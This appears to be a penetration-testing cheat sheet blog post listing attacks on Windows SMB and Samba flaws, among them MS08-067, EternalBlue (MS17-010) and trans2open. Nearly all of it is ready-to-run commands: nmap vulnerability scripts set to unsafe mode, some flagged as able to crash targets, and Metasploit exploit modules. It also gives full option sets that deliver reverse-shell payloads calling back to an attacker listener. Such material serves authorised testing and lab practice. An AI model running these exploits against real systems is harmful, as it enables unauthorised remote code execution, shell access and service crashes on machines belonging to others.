#MS03-026: Buffer Overrun In RPC Interface Could Allow Code Execution (823980) [CAN-2003-0352]
Exploit-DB: 66.c

#MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280) [CVE-2006-2370] (Buffer overflow in RRAS)
nmap -sV -p445 --script=smb-vuln-ms06-025 --script-args unsafe=1 10.10.x.x

#MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) [CVE-2006-3439]
use exploit/windows/smb/ms06_040_netapi ***

#MS07-029: Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution (935966) [CVE-2007-1748] (Buffer overflow which can crash the RPC interface in the DNS Server)
nmap -sV -p445 --script=smb-vuln-ms07-029 --script-args unsafe=1 10.10.x.x

#MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) [CVE-2008-4250] (Buffer overflow/RCE. Dangerous, can crash the target)
nmap -sV -p445 --script=smb-vuln-ms08-067 --script-args unsafe=1 10.10.x.x
nmap -sV -p445 --script=smb-vuln-conficker --script-args unsafe=1  10.10.x.x # (dangerous, can crash target)
Exploit-DB: 7132.py ***
msf > use exploit/windows/smb/ms08_067_netapi ***

#MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) [CVE-2010-2729] (Print vulnerability. Safe and can't crash the target)
nmap -sV -p445 --script=smb-vuln-ms10-061 --script-args unsafe=1 10.10.x.x

#MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (uncredentialed check) [CVE-2017-0143] (RCE, just checking if vulnerable)
nmap -sV -p445 --script=smb-vuln-ms17-010 --script-args unsafe=1 10.10.x.x
nmap -sV -p445 --script=smb2-vuln-uptime --script-args smb2-vuln-uptime.skip-os=true 10.10.x.x
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > use exploit/windows/smb/ms17_010_psexec

#(IMPORTANT MS17_010_PSEXEC is a staged payload, means you need meterpreter !)
#(IMPORTANT 2, if object can't be found, try to modify your target !)
set SHARE ADMIN$
set SMBDomain secybr.local
set ALLOW_GUEST true
set LPORT 445
set LHOST 10.10.y.y
set RHOST 10.10.x.x
set TARGET 3       #(TARGET 1 = PowerShell / TARGET 2 = Native / TARGET 3 = MOF => share ADMIN$)
set PAYLOAD windows/shell/reverse_tcp
set VERBOSE true
set DBGTRACE true
set EXITFUNC thread
exploit -j

#Trans2open Exploitation
# Samba 2.2.X are usually vulnerable to trans2open
msf > use exploit/linux/samba/trans2open
set VERBOSE true
set PAYLOAD linux/x86/shell_reverse_tcp
set RHOST 10.10.x.x
set LPORT 443
set LHOST IP
exploit -j -z

#Samba 3.4.5 Symlink Directory Traversal
# You can mount the root filesystem to a share you can access
https://www.exploit-db.com/exploits/33599

# Using metasploit
https://www.exploit-db.com/exploits/33598
msf > use auxiliary/admin/smb/samba_symlink_traversal

This post is licensed under CC BY 4.0 by the author.

Powered by 0xhav0c © 2022